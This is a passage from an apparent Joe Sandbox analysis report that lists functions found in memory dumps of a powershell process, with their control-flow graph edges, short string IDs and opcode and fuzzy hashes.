                                                control_flow_graph 2479 385068-385095 2480 3850ad-385100 2479->2480 2481 385097-38509d 2479->2481 2488 385129-385133 2480->2488 2489 385102-385121 2480->2489 2482 38509f 2481->2482 2483 3850a1-3850ab 2481->2483 2482->2480 2483->2480 2490 385139-38514d 2488->2490 2491 3855e4-38562a 2488->2491 2489->2488 2490->2491 2493 385153-385158 2490->2493 2513 38562c-38564b 2491->2513 2514 385653-38568b 2491->2514 2494 38515a-385160 2493->2494 2495 385170-38517c 2493->2495 2498 385162 2494->2498 2499 385164-38516e 2494->2499 2495->2491 2497 385182-385187 2495->2497 2500 385189-38518f 2497->2500 2501 38519f-3851ab 2497->2501 2498->2495 2499->2495 2503 385191 2500->2503 2504 385193-38519d 2500->2504 2501->2491 2505 3851b1-3851f8 2501->2505 2503->2501 2504->2501 2517 3851fa-385200 2505->2517 2518 385212-38523e 2505->2518 2513->2514 2527 38568c 2514->2527 2520 385202 2517->2520 2521 385204-385210 2517->2521 2518->2491 2529 385244-385249 2518->2529 2520->2518 2521->2518 2527->2527 2530 38524b-385251 2529->2530 2531 385261-3852f2 2529->2531 2532 385253 2530->2532 2533 385255-38525f 2530->2533 2543 3852f8-38532c 2531->2543 2544 385497-3854bc 2531->2544 2532->2531 2533->2531 2543->2544 2549 385332-385353 2543->2549 2552 3854c1-385505 2544->2552 2553 38536d-38536f 2549->2553 2554 385355-38535b 2549->2554 2552->2491 2558 385389-3853ab 2553->2558 2559 385371-385377 2553->2559 2556 38535d 2554->2556 2557 38535f-38536b 2554->2557 2556->2553 2557->2553 2558->2544 2568 3853b1-3853d2 2558->2568 2560 385379 2559->2560 2561 38537b-385387 2559->2561 2560->2558 2561->2558 2571 3853ec-3853ee 2568->2571 2572 3853d4-3853da 2568->2572 2573 385408-385453 2571->2573 2574 3853f0-3853f6 2571->2574 2575 3853dc 2572->2575 2576 3853de-3853ea 2572->2576 2573->2544 2585 385455-38546b 2573->2585 2577 3853f8 2574->2577 2578 3853fa-385406 2574->2578 2575->2571 2576->2571 2577->2573 2578->2573 2587 385475-385495 2585->2587 2587->2552
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$4'p$4'p$4'p
                                                • API String ID: 0-4019061985
                                                • Opcode ID: 6c9ce8543083baf795d3aa98d6f99edca6e350542e6a685a8e8174578f034731
                                                • Instruction ID: 9cfa90ad7bdc0f9c70a15dd2bbaa366eede42c1b42ed507b90e415e1f9d64749
                                                • Opcode Fuzzy Hash: 6c9ce8543083baf795d3aa98d6f99edca6e350542e6a685a8e8174578f034731
                                                • Instruction Fuzzy Hash: 34E14D74B003049FDB15EB68C455B6EBBF2AF88304F2584A9E815AF395CB71DC82CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0038C66E Relevance: 4.3, Strings: 3, Instructions: 559COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2590 38c66e-38c67b 2591 38c681-38c6cb 2590->2591 2592 38c753-38c793 2590->2592 2591->2592 2597 38c6d1-38c740 2591->2597 2602 38c798 2592->2602 2723 38c743 call 3832b0 2597->2723 2724 38c743 call 383294 2597->2724 2605 38bfdd 2602->2605 2606 38bfe4-38c005 2602->2606 2605->2606 2607 38c21b-38c23c 2605->2607 2608 38c034-38c041 2606->2608 2609 38c007-38c02c 2606->2609 2611 38c26b-38c34d 2607->2611 2612 38c23e-38c263 2607->2612 2608->2592 2610 38c047-38c078 2608->2610 2609->2608 2610->2592 2623 38c07e-38c12f 2610->2623 2669 38c5ee-38c619 2611->2669 2670 38c353-38c368 2611->2670 2612->2611 2618 38c745-38c84f 2624 38c87e-38c88b 2618->2624 2625 38c851-38c876 2618->2625 2623->2592 2661 38c135-38c181 2623->2661 2627 38d08f-38d0d4 2624->2627 2628 38c891-38c896 2624->2628 2625->2624 2631 38c898-38c89e 2628->2631 2632 38c8ae-38c8c0 2628->2632 2633 38c8a0 2631->2633 2634 38c8a2-38c8ac 2631->2634 2632->2627 2636 38c8c6-38c8d1 2632->2636 2633->2632 2634->2632 2638 38c8e9-38c978 2636->2638 2639 38c8d3-38c8d9 2636->2639 2643 38c8db 2639->2643 2644 38c8dd-38c8e7 2639->2644 2643->2638 2644->2638 2661->2592 2671 38c187-38c214 2661->2671 2686 38c61e-38c66b 2669->2686 2675 38c36a-38c370 2670->2675 2676 38c382-38c3aa 2670->2676 2671->2607 2677 38c372 2675->2677 2678 38c374-38c380 2675->2678 2676->2669 2689 38c3b0-38c3d0 2676->2689 2677->2676 2678->2676 2686->2602 2689->2669 2693 38c3d6-38c426 2689->2693 2693->2669 2699 38c42c-38c539 2693->2699 2699->2669 2712 38c53f-38c5a4 2699->2712 2712->2669 2718 38c5a6-38c5bf 2712->2718 2720 38c5c9-38c5ec 2718->2720 2720->2686 2723->2618 2724->2618
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$h%h$h%h
                                                • API String ID: 0-2059351901
                                                • Opcode ID: 82de974378c85a395b5f3c4c1593bbad92be8981b3acdca35873a8cf7c1cab53
                                                • Instruction ID: e7847761ad3918826fa97d4cbe4d9a47db7754b2e5f0d0025ca1d14556aabe5c
                                                • Opcode Fuzzy Hash: 82de974378c85a395b5f3c4c1593bbad92be8981b3acdca35873a8cf7c1cab53
                                                • Instruction Fuzzy Hash: 35326174B102149FDB64DB58CD50FAABBB2AF89300F5180D9D909AF355CB71ED828F91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0038BF47 Relevance: 2.9, Strings: 2, Instructions: 427COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2740 38bf47-38bfcc 2744 38bfcf-38bfdb 2740->2744 2745 38bfdd 2744->2745 2746 38bfe4-38c005 2744->2746 2745->2746 2747 38c21b-38c23c 2745->2747 2748 38c034-38c041 2746->2748 2749 38c007-38c02c 2746->2749 2752 38c26b-38c34d 2747->2752 2753 38c23e-38c263 2747->2753 2750 38c753-38c793 2748->2750 2751 38c047-38c078 2748->2751 2749->2748 2768 38c798 2750->2768 2751->2750 2762 38c07e-38c12f 2751->2762 2784 38c5ee-38c619 2752->2784 2785 38c353-38c368 2752->2785 2753->2752 2762->2750 2778 38c135-38c181 2762->2778 2768->2744 2778->2750 2786 38c187-38c214 2778->2786 2801 38c61e-38c66b 2784->2801 2790 38c36a-38c370 2785->2790 2791 38c382-38c3aa 2785->2791 2786->2747 2792 38c372 2790->2792 2793 38c374-38c380 2790->2793 2791->2784 2804 38c3b0-38c3d0 2791->2804 2792->2791 2793->2791 2801->2768 2804->2784 2808 38c3d6-38c426 2804->2808 2808->2784 2814 38c42c-38c539 2808->2814 2814->2784 2827 38c53f-38c5a4 2814->2827 2827->2784 2833 38c5a6-38c5a9 2827->2833 2834 38c5b3-38c5bf 2833->2834 2835 38c5c9-38c5ec 2834->2835 2835->2801
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p$4'p
                                                • API String ID: 0-3973980265
                                                • Opcode ID: d2bc6683e2378df096c483bc488c8277eda1cd50bf53fb0f9f4adba99530bf78
                                                • Instruction ID: 8f01e7b2e51959a57b5a9930587e622613e5bfcbe22ebf364edb4665bb101640
                                                • Opcode Fuzzy Hash: d2bc6683e2378df096c483bc488c8277eda1cd50bf53fb0f9f4adba99530bf78
                                                • Instruction Fuzzy Hash: A9026274B102149FDB64DB58CD50FAABBB2AF89304F5080E9D909AF395CB71ED818F91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 003832B0 Relevance: 2.8, Strings: 2, Instructions: 276COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2838 3832b0-3832e1 2841 383300 2838->2841 2842 3832e3-3832fe 2838->2842 2843 383302-383304 2841->2843 2842->2843 2844 38330a-38330c 2843->2844 2845 383475-38347f 2843->2845 2847 38331c 2844->2847 2848 38330e-38331a 2844->2848 2849 38348d-383493 2845->2849 2850 383481-38348a 2845->2850 2851 38331e-383320 2847->2851 2848->2851 2852 383499-3834a5 2849->2852 2853 383495-383497 2849->2853 2851->2845 2855 383326-38332a 2851->2855 2856 3834a7-3834c8 2852->2856 2853->2856 2857 38332c-38333b 2855->2857 2858 38333d 2855->2858 2860 38333f-383341 2857->2860 2858->2860 2860->2845 2862 383347-38337e 2860->2862 2867 3834cb-383500 2862->2867 2868 383384-383389 2862->2868 2874 383510 2867->2874 2875 383502-38350e 2867->2875 2869 38338b-383391 2868->2869 2870 3833a1-3833ba 2868->2870 2871 383393 2869->2871 2872 383395-38339f 2869->2872 2870->2867 2879 3833c0-3833e0 2870->2879 2871->2870 2872->2870 2877 383512-383514 2874->2877 2875->2877 2880 38358e-383598 2877->2880 2881 383516-383518 2877->2881 2890 3833fa-383406 2879->2890 2891 3833e2-3833e8 2879->2891 2882 38359a-3835a0 2880->2882 2883 3835a3-3835a9 2880->2883 2884 383528 2881->2884 2885 38351a-383526 2881->2885 2887 3835ab-3835ad 2883->2887 2888 3835af-3835bb 2883->2888 2889 38352a-38352c 2884->2889 2885->2889 2892 3835bd-3835d6 2887->2892 2888->2892 2889->2880 2893 38352e-383534 2889->2893 2896 38340b-383413 2890->2896 2894 3833ea 2891->2894 2895 3833ec-3833f8 2891->2895 2898 383542-38354b 2893->2898 2899 383536-383538 2893->2899 2894->2890 2895->2890 2901 383421-383437 2896->2901 2902 383415-383417 2896->2902 2903 383559-383576 2898->2903 2904 38354d-38354f 2898->2904 2899->2898 2911 383439-38343b 2901->2911 2912 383445-38344a 2901->2912 2902->2901 2909 383578-383588 2903->2909 2910 3835d9-3835de 2903->2910 2904->2903 2909->2880 2910->2909 2911->2912 2913 38344c 2912->2913 2914 38344e-383454 2912->2914 2913->2914 2914->2867 2916 383456-383472 2914->2916
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tPp$tPp
                                                • API String ID: 0-1160507146
                                                • Opcode ID: 304ae341ad8918371d36c4c5a0f5faaf2e708196f7e9fb3cecfc57fd06cf9718
                                                • Instruction ID: 5156ed840e40198b9a765f8f0dcfe59ca8159b00b6303680e3f1b5b8222f5fe4
                                                • Opcode Fuzzy Hash: 304ae341ad8918371d36c4c5a0f5faaf2e708196f7e9fb3cecfc57fd06cf9718
                                                • Instruction Fuzzy Hash: 0A9129357003019FCB16AE69C850B6FBBE6AFC5710F2984A9E8459B391CFB1DE41C761
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04A40048 Relevance: 2.7, Strings: 2, Instructions: 236COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2918 4a40048-4a40077 2920 4a4008f-4a400e2 2918->2920 2921 4a40079-4a4007f 2918->2921 2928 4a400e4-4a40103 2920->2928 2929 4a4010b-4a40112 2920->2929 2922 4a40081 2921->2922 2923 4a40083-4a4008d 2921->2923 2922->2920 2923->2920 2928->2929 2930 4a40118-4a4011d 2929->2930 2931 4a402ca-4a402f6 2929->2931 2933 4a40135-4a40144 2930->2933 2934 4a4011f-4a40125 2930->2934 2958 4a402fb-4a4030f 2931->2958 2933->2931 2935 4a4014a-4a40152 2933->2935 2937 4a40127 2934->2937 2938 4a40129-4a40133 2934->2938 2939 4a40154-4a4015a 2935->2939 2940 4a4016a-4a40179 2935->2940 2937->2933 2938->2933 2941 4a4015c 2939->2941 2942 4a4015e-4a40168 2939->2942 2940->2931 2943 4a4017f-4a40187 2940->2943 2941->2940 2942->2940 2946 4a4019f-4a401ae 2943->2946 2947 4a40189-4a4018f 2943->2947 2946->2931 2950 4a401b4-4a401cf 2946->2950 2948 4a40191 2947->2948 2949 4a40193-4a4019d 2947->2949 2948->2946 2949->2946 2956 4a401d1-4a401d7 2950->2956 2957 4a401e9-4a401fd 2950->2957 2961 4a401d9 2956->2961 2962 4a401db-4a401e7 2956->2962 2988 4a40200 call 38fc5c 2957->2988 2989 4a40200 call 38fa35 2957->2989 2959 4a40311-4a40330 2958->2959 2960 4a40338-4a40370 2958->2960 2959->2960 2976 4a40371 2960->2976 2961->2957 2962->2957 2967 4a40202-4a4020c 2967->2931 2969 4a40212-4a40217 2967->2969 2970 4a4022f-4a40238 2969->2970 2971 4a40219-4a4021f 2969->2971 2970->2931 2975 4a4023e-4a4025c 2970->2975 2973 4a40221 2971->2973 2974 4a40223-4a4022d 2971->2974 2973->2970 2974->2970 2979 4a40276-4a402c8 2975->2979 2980 4a4025e-4a40264 2975->2980 2976->2976 2979->2958 2981 4a40266 2980->2981 2982 4a40268-4a40274 2980->2982 2981->2979 2982->2979 2988->2967 2989->2967
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.779886012.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_4a40000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: h%h$h%h
                                                • API String ID: 0-778770776
                                                • Opcode ID: bee226714db38b6ea3138da2c0a309c8a810d4f2d2659c557974da62d793d6aa
                                                • Instruction ID: 1a59b832540b4db15fe548d23eaabb3ece152de200b25518fc03c5531fbfe2ed
                                                • Opcode Fuzzy Hash: bee226714db38b6ea3138da2c0a309c8a810d4f2d2659c557974da62d793d6aa
                                                • Instruction Fuzzy Hash: E4913C74A04204EFDB54DFA8C581AAEBBF2ABCC314F248469D905AF355CB35EC82DB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04A40736 Relevance: 2.7, Strings: 2, Instructions: 197COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2990 4a40736-4a40739 2991 4a4073f-4a40747 2990->2991 2992 4a4073b-4a4073d 2990->2992 2993 4a4075f-4a40763 2991->2993 2994 4a40749-4a4074e 2991->2994 2992->2991 2995 4a40986-4a40990 2993->2995 2996 4a40769-4a4076d 2993->2996 2997 4a40753-4a4075d 2994->2997 2998 4a4074f 2994->2998 2999 4a40992-4a4099b 2995->2999 3000 4a4099e-4a409a4 2995->3000 3001 4a40780 2996->3001 3002 4a4076f-4a4077e 2996->3002 2997->2993 2998->2997 3003 4a40751 2998->3003 3004 4a409a6-4a409a8 3000->3004 3005 4a409aa-4a409b6 3000->3005 3006 4a40782-4a40784 3001->3006 3002->3006 3003->2993 3008 4a409b8-4a409db 3004->3008 3005->3008 3006->2995 3009 4a4078a-4a4078e 3006->3009 3011 4a40790-4a4079f 3009->3011 3012 4a407a1 3009->3012 3013 4a407a3-4a407a5 3011->3013 3012->3013 3013->2995 3015 4a407ab-4a407b8 3013->3015 3016 4a40870-4a408bf 3015->3016 3017 4a407be-4a407cf 3015->3017 3041 4a408c6-4a408cc 3016->3041 3021 4a407d1-4a407d7 3017->3021 3022 4a407e9-4a40808 3017->3022 3024 4a407d9 3021->3024 3025 4a407db-4a407e7 3021->3025 3022->3016 3028 4a4080a-4a4082a 3022->3028 3024->3022 3025->3022 3032 4a40844-4a4085d 3028->3032 3033 4a4082c-4a40832 3028->3033 3038 4a4085f-4a40861 3032->3038 3039 4a4086b-4a4086e 3032->3039 3034 4a40834 3033->3034 3035 4a40836-4a40842 3033->3035 3034->3032 3035->3032 3038->3039 3039->3041 3042 4a408ce-4a408d7 3041->3042 3043 4a408ef 3041->3043 3044 4a408de-4a408eb 3042->3044 3045 4a408d9-4a408dc 3042->3045 3046 4a408f2-4a408fb 3043->3046 3047 4a408ed 3044->3047 3045->3047 3048 4a408fd-4a40900 3046->3048 3049 4a4090a-4a40922 3046->3049 3047->3046 3048->3049 3054 4a40925 call 21c050 3049->3054 3055 4a40925 call 21c058 3049->3055 3052 4a40927-4a40983 3054->3052 3055->3052
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.779886012.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_4a40000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: tPp$tPp
                                                • API String ID: 0-1160507146
                                                • Opcode ID: 688796968204f0b0fa53be930ab4c11ffa45983e9a1d23c2e9d7f8175af769ea
                                                • Instruction ID: 114a187ac03c8bcefdd8fc55a193f59bd6e2e0c3d6f9e4647238ea14ecdfa8e6
                                                • Opcode Fuzzy Hash: 688796968204f0b0fa53be930ab4c11ffa45983e9a1d23c2e9d7f8175af769ea
                                                • Instruction Fuzzy Hash: 2F71D535704204DFDB14DF68C5406AEBBE2EBC8320F288469EA599F352DB31EC41EB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00380D78 Relevance: 2.6, Strings: 2, Instructions: 107COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 3056 380d78-380da1 3057 380f84-380fb9 3056->3057 3058 380da7-380dac 3056->3058 3066 380fbb-380fca 3057->3066 3067 380fcc 3057->3067 3059 380dae-380db4 3058->3059 3060 380dc4-380dc8 3058->3060 3061 380db8-380dc2 3059->3061 3062 380db6 3059->3062 3064 380dce-380dd8 3060->3064 3065 380f34-380f3e 3060->3065 3061->3060 3062->3060 3064->3057 3068 380dde-380de3 3064->3068 3069 380f4c-380f52 3065->3069 3070 380f40-380f49 3065->3070 3072 380fce-380fd0 3066->3072 3067->3072 3073 380dfb-380dff 3068->3073 3074 380de5-380deb 3068->3074 3075 380f58-380f64 3069->3075 3076 380f54-380f56 3069->3076 3077 381076-381080 3072->3077 3078 380fd6-380fd8 3072->3078 3073->3065 3082 380e05-380e07 3073->3082 3079 380ded 3074->3079 3080 380def-380df9 3074->3080 3081 380f66-380f81 3075->3081 3076->3081 3085 38108b-381091 3077->3085 3086 381082-381088 3077->3086 3087 380fe8 3078->3087 3088 380fda-380fe6 3078->3088 3079->3073 3080->3073 3083 380e09-380e24 3082->3083 3084 380e26 3082->3084 3093 380e28-380e2a 3083->3093 3084->3093 3091 381093-381095 3085->3091 3092 381097-3810a3 3085->3092 3094 380fea-380fec 3087->3094 3088->3094 3097 3810a5-3810c0 3091->3097 3092->3097 3093->3065 3098 380e30-380e3a 3093->3098 3094->3077 3099 380ff2-381011 3094->3099 3098->3057 3102 380e40-380e45 3098->3102 3099->3077 3114 381013-38101a 3099->3114 3105 380e5d-380e6b 3102->3105 3106 380e47-380e4d 3102->3106 3105->3065 3113 380e71-380e8e 3105->3113 3108 380e4f 3106->3108 3109 380e51-380e5b 3106->3109 3108->3105 3109->3105 3113->3065 3129 380e94-380eb9 3113->3129 3116 381020-381025 3114->3116 3117 3810c3-3810f8 3114->3117 3119 38103d-38106a 3116->3119 3120 381027-38102d 3116->3120 3126 3810fa-381109 3117->3126 3127 38110b 3117->3127 3200 38106d call 380d78 3119->3200 3201 38106d call 380c30 3119->3201 3202 38106d call 380c10 3119->3202 3121 38102f 3120->3121 3122 381031-38103b 3120->3122 3121->3119 3122->3119 3128 38110d-38110f 3126->3128 3127->3128 3131 3811c4-3811ce 3128->3131 3132 381115-381117 3128->3132 3129->3065 3149 380ebb 3129->3149 3137 3811da-3811e0 3131->3137 3138 3811d0-3811d7 3131->3138 3134 381119-381125 3132->3134 3135 381127 3132->3135 3139 381129-38112b 3134->3139 3135->3139 3140 3811e2-3811e4 3137->3140 3141 3811e6-3811f2 3137->3141 3139->3131 3144 381131-381138 3139->3144 3143 3811f4-381210 3140->3143 3141->3143 3142 38106f-381073 3147 38113e-381143 3144->3147 3148 381213-381248 3144->3148 3151 38115b-38117f 3147->3151 3152 381145-38114b 3147->3152 3158 381258 3148->3158 3159 38124a-381256 3148->3159 3156 380ec5-380ec9 3149->3156 3163 381199-3811a7 3151->3163 3164 381181-381187 3151->3164 3153 38114d 3152->3153 3154 38114f-381159 3152->3154 3153->3151 3154->3151 3160 380ecb-380ed1 3156->3160 3161 380ee3-380f31 3156->3161 3166 38125a-38125c 3158->3166 3159->3166 3167 380ed3 3160->3167 3168 380ed5-380ee1 3160->3168 3187 3811ae-3811c1 3163->3187 3169 381189 3164->3169 3170 38118b-381197 3164->3170 3172 38125e-381260 3166->3172 3173 3812d6-3812e0 3166->3173 3167->3161 3168->3161 3169->3163 3170->3163 3179 381270 3172->3179 3180 381262-38126e 3172->3180 3177 3812eb-3812f1 3173->3177 3178 3812e2-3812e8 3173->3178 3181 3812f3-3812f5 3177->3181 3182 3812f7-381303 3177->3182 3183 381272-381274 3179->3183 3180->3183 3185 381305-38131e 3181->3185 3182->3185 3183->3173 3186 381276-38127c 3183->3186 3189 38128a-381293 3186->3189 3190 38127e-381280 3186->3190 3191 3812a1-3812be 3189->3191 3192 381295-381297 3189->3192 3190->3189 3197 3812c0-3812d0 3191->3197 3198 381321-381326 3191->3198 3192->3191 3197->3173 3198->3197 3200->3142 3201->3142 3202->3142
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 9)$9)
                                                • API String ID: 0-723719325
                                                • Opcode ID: 6b48f7c1b92780a77db281ea7943dc7a7070d790595c66513a8ace72d3833b65
                                                • Instruction ID: 2aa653359e87701f984408efa37f49182c15909ef053c075710f6180395880dd
                                                • Opcode Fuzzy Hash: 6b48f7c1b92780a77db281ea7943dc7a7070d790595c66513a8ace72d3833b65
                                                • Instruction Fuzzy Hash: 0D318071A017048FCBADEF68C540A6AB7E5AF98310F2684E9D9049B351D771FC89CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 003818A0 Relevance: 2.6, Strings: 2, Instructions: 94COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 3203 3818a0-3818b0 3204 3818c0 3203->3204 3205 3818b2-3818be 3203->3205 3206 3818c2-3818c4 3204->3206 3205->3206 3207 3818ca-3818cc 3206->3207 3208 38195d-381967 3206->3208 3209 3818dc 3207->3209 3210 3818ce-3818da 3207->3210 3211 381969-38196f 3208->3211 3212 381972-381978 3208->3212 3215 3818de-3818e0 3209->3215 3210->3215 3213 38197a-38197c 3212->3213 3214 38197e-38198a 3212->3214 3216 38198c-3819a5 3213->3216 3214->3216 3215->3208 3217 3818e2-3818e8 3215->3217 3219 3818ea-3818ec 3217->3219 3220 3818f6-381938 3217->3220 3219->3220 3226 3819a8-3819ad 3220->3226 3227 38193a-381941 3220->3227 3226->3227 3230 381948-381957 3227->3230 3230->3208
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: T;)$T;)
                                                • API String ID: 0-3531563408
                                                • Opcode ID: 942bb767479af165f92d538438e8825d35650f8115405e08e491ba59d2a2828d
                                                • Instruction ID: 277299e66561a2f52499555122f96b13a987674b2da58d3ac9b942ce71983d98
                                                • Opcode Fuzzy Hash: 942bb767479af165f92d538438e8825d35650f8115405e08e491ba59d2a2828d
                                                • Instruction Fuzzy Hash: AC2127363043015BDB25697E8891B7BA6DE9FC8310F28847AE545CB2C4DBB5DD86C3A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00381884 Relevance: 2.6, Strings: 2, Instructions: 80COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: T;)$T;)
                                                • API String ID: 0-3531563408
                                                • Opcode ID: 5714e3449f699cea59353328806a17689bed06c3c84fb2cac873bb1c49c261cc
                                                • Instruction ID: 95d6c85d02c1fbcdf623f19a8e004eac6eea689801888b7cbf81bde16d636b61
                                                • Opcode Fuzzy Hash: 5714e3449f699cea59353328806a17689bed06c3c84fb2cac873bb1c49c261cc
                                                • Instruction Fuzzy Hash: 482149267083806FDB2316754861B77BFED4F86300F2D40AAE985DB2D3D6A5CC46C361
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0038BF83 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p
                                                • API String ID: 0-481844870
                                                • Opcode ID: 08d6219ccb6bc25f701b7bc01e1474d0ddeecd9d83d655ba5371f32b1b7e02bc
                                                • Instruction ID: 3d2a4455efd155d26338457c585dc916803dc3501b2c266f0e3cce0b9d0896a8
                                                • Opcode Fuzzy Hash: 08d6219ccb6bc25f701b7bc01e1474d0ddeecd9d83d655ba5371f32b1b7e02bc
                                                • Instruction Fuzzy Hash: 54029374B102049FDB64DB58C951FAABBB2EF89300F5080D9E9099F395CB71ED818F91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0038C7E4 Relevance: 1.7, Strings: 1, Instructions: 402COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p
                                                • API String ID: 0-481844870
                                                • Opcode ID: fe5f06c5fa434df694fcba0468d7be8b913a2285731578c9f09725c61473889b
                                                • Instruction ID: 0c3dbd3a698f0ed9c4e10a2fd52640f191e40fe456139260f5a18614ca8c3830
                                                • Opcode Fuzzy Hash: fe5f06c5fa434df694fcba0468d7be8b913a2285731578c9f09725c61473889b
                                                • Instruction Fuzzy Hash: 10027174B10214AFDB64DB54CD50FAABBB2AF89304F5080D9E909AF395CB71ED818F91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0038C805 Relevance: 1.6, Strings: 1, Instructions: 396COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 4'p
                                                • API String ID: 0-481844870
                                                • Opcode ID: 80f1b246aaef84f8a39538ba19f396178aafc54b1107e8ded6e821a2006a7a29
                                                • Instruction ID: 994b3bb3cb840fec22ce8b297f34aaa8747358479119ec0e9fe1876a9b7932ec
                                                • Opcode Fuzzy Hash: 80f1b246aaef84f8a39538ba19f396178aafc54b1107e8ded6e821a2006a7a29
                                                • Instruction Fuzzy Hash: 47028274B10214AFDB64DB14C950FAABBB2AF89300F5080D9E909AF395CB71ED818F91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0038CBA8 Relevance: 1.6, Strings: 1, Instructions: 327COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.746966506.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_380000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: [h
                                                • API String ID: 0-1382348864
                                                • Opcode ID: 5d6deb11f601446642b246a00791b8f1377a64eac8e46d480061f3d92178d413
                                                • Instruction ID: efe6ae4233b47a3931e9ffcd6226740f033d4ff3c792f161f2fedc89176cf10b
                                                • Opcode Fuzzy Hash: 5d6deb11f601446642b246a00791b8f1377a64eac8e46d480061f3d92178d413
                                                • Instruction Fuzzy Hash: 0FE17074B10214DFDB65EB68C944BAABBB2BB88304F2080E5D909AF785CB31DD81DF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0021C050 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
